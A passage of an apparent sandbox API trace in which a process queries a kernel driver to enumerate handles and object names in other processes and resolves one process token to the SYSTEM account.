PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.872] ObReferenceObjectByHandle (in: Handle=0x448, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039fb800, HandleInformation=0x0) returned 0x0 [0244.872] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.872] PsReleaseProcessExitSynchronization () returned 0x2 [0244.872] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.872] ObQueryNameString (in: Object=0xfffffa80039fb800, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.872] ObfDereferenceObject (Object=0xfffffa80039fb800) returned 0x2 [0244.872] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.872] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.872] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.872] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0244.872] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.872] PsAcquireProcessExitSynchronization () returned 0x0 [0244.872] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.872] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039fc8d0, HandleInformation=0x0) returned 0x0 [0244.872] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.873] PsReleaseProcessExitSynchronization () returned 0x2 [0244.873] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.873] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.873] ObfDereferenceObject (Object=0xfffffa80039fc8d0) returned 0x1 [0244.873] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.873] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.873] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.873] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0244.873] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.873] PsAcquireProcessExitSynchronization () returned 0x0 [0244.873] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.873] ObReferenceObjectByHandle (in: Handle=0x468, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039fe250, HandleInformation=0x0) returned 0x0 [0244.873] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.873] PsReleaseProcessExitSynchronization () returned 0x2 [0244.873] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.873] ObQueryNameString (in: Object=0xfffffa80039fe250, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.873] ObfDereferenceObject (Object=0xfffffa80039fe250) returned 0x14 [0244.873] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.873] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.873] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.873] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.873] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.874] PsAcquireProcessExitSynchronization () returned 0x0 [0244.874] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.874] ObReferenceObjectByHandle (in: Handle=0x46c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039fd070, HandleInformation=0x0) returned 0x0 [0244.874] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.874] PsReleaseProcessExitSynchronization () returned 0x2 [0244.874] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.874] ObQueryNameString (in: Object=0xfffffa80039fd070, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.874] ObfDereferenceObject (Object=0xfffffa80039fd070) returned 0x1 [0244.874] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.874] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.874] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.874] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.874] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.874] PsAcquireProcessExitSynchronization () returned 0x0 [0244.874] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.874] ObReferenceObjectByHandle (in: Handle=0x470, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039fddd0, HandleInformation=0x0) returned 0x0 [0244.874] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.874] PsReleaseProcessExitSynchronization () returned 0x2 [0244.874] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.874] ObQueryNameString (in: Object=0xfffffa80039fddd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.874] ObfDereferenceObject (Object=0xfffffa80039fddd0) returned 0x2 [0244.874] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.874] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.875] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.875] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.875] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.875] PsAcquireProcessExitSynchronization () returned 0x0 [0244.875] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.875] ObReferenceObjectByHandle (in: Handle=0x474, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039fdc80, HandleInformation=0x0) returned 0x0 [0244.875] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.875] PsReleaseProcessExitSynchronization () returned 0x2 [0244.875] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.875] ObQueryNameString (in: Object=0xfffffa80039fdc80, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.875] ObfDereferenceObject (Object=0xfffffa80039fdc80) returned 0x1 [0244.875] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.875] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.875] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.875] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0244.875] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.875] PsAcquireProcessExitSynchronization () returned 0x0 [0244.875] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.875] ObReferenceObjectByHandle (in: Handle=0x57c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0244.875] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.875] PsReleaseProcessExitSynchronization () returned 0x2 [0244.875] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.875] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.876] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0244.876] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.876] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.876] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.876] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0244.876] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.876] PsAcquireProcessExitSynchronization () returned 0x0 [0244.876] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.876] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003aba990, HandleInformation=0x0) returned 0x0 [0244.876] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.876] PsReleaseProcessExitSynchronization () returned 0x2 [0244.876] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.876] ObQueryNameString (in: Object=0xfffffa8003aba990, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.876] ObfDereferenceObject (Object=0xfffffa8003aba990) returned 0x2 [0244.876] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.876] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.876] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x34, lpOverlapped=0x0) returned 1 [0244.877] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.877] PsAcquireProcessExitSynchronization () returned 0x0 [0244.877] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.877] ObReferenceObjectByHandle (in: Handle=0x584, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003abac80, HandleInformation=0x0) returned 0x0 [0244.877] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.877] PsReleaseProcessExitSynchronization () returned 0x2 [0244.877] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.877] ObQueryNameString (in: Object=0xfffffa8003abac80, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.877] ObfDereferenceObject (Object=0xfffffa8003abac80) returned 0x1 [0244.877] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.877] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.877] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0244.877] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.877] PsAcquireProcessExitSynchronization () returned 0x0 [0244.877] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.877] ObReferenceObjectByHandle (in: Handle=0x5c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0244.877] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.877] PsReleaseProcessExitSynchronization () returned 0x2 [0244.877] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.877] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.877] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0244.877] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.877] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.877] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.877] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0244.878] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.878] PsAcquireProcessExitSynchronization () returned 0x0 [0244.878] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.878] ObReferenceObjectByHandle (in: Handle=0x660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a5af20, HandleInformation=0x0) returned 0x0 [0244.878] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.878] PsReleaseProcessExitSynchronization () returned 0x2 [0244.878] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.878] ObQueryNameString (in: Object=0xfffffa80026ec8a0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.878] ObfDereferenceObject (Object=0xfffffa8003a5af20) returned 0x1 [0244.878] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.878] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.878] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.878] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0244.878] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.878] PsAcquireProcessExitSynchronization () returned 0x0 [0244.878] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.878] ObReferenceObjectByHandle (in: Handle=0x6a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a033a0, HandleInformation=0x0) returned 0x0 [0244.878] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.878] PsReleaseProcessExitSynchronization () returned 0x2 [0244.878] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.878] ObQueryNameString (in: Object=0xfffffa8003a033a0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.878] ObfDereferenceObject (Object=0xfffffa8003a033a0) returned 0x11 [0244.878] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.879] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.879] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.879] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0244.879] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.879] PsAcquireProcessExitSynchronization () returned 0x0 [0244.879] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0244.879] ObReferenceObjectByHandle (in: Handle=0x700, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034d2d10, HandleInformation=0x0) returned 0x0 [0244.879] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.879] PsReleaseProcessExitSynchronization () returned 0x2 [0244.879] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0244.879] ObQueryNameString (in: Object=0xfffffa80034d2d10, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0244.879] ObfDereferenceObject (Object=0xfffffa80034d2d10) returned 0x1 [0244.879] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.879] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x370) returned 0xc8 [0244.879] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0244.879] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800382ab30, HandleInformation=0x0) returned 0x0 [0244.879] ObOpenObjectByPointer (in: Object=0xfffffa800382ab30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0244.879] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1de [0244.879] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa8001e93240 | out: TokenHandle=0xfffffa8001e93240*=0xc4) returned 0x0 [0244.879] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0244.879] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.879] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0244.879] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0244.881] CloseHandle (hObject=0xc4) returned 1 [0244.881] CloseHandle (hObject=0xc8) returned 1 [0244.881] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.881] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0244.881] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.881] PsAcquireProcessExitSynchronization () returned 0x0 [0244.881] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.881] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800382cd00, HandleInformation=0x0) returned 0x0 [0244.881] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0244.881] PsReleaseProcessExitSynchronization () returned 0x2 [0244.881] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dc [0244.881] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0244.881] ObfDereferenceObject (Object=0xfffffa800382cd00) returned 0x1 [0244.881] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0244.882] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0244.882] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0244.882] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0244.882] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0244.882] PsAcquireProcessExitSynchronization () returned 0x0 [0244.882] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0244.882] ObReferenceObjectByHandle (in: 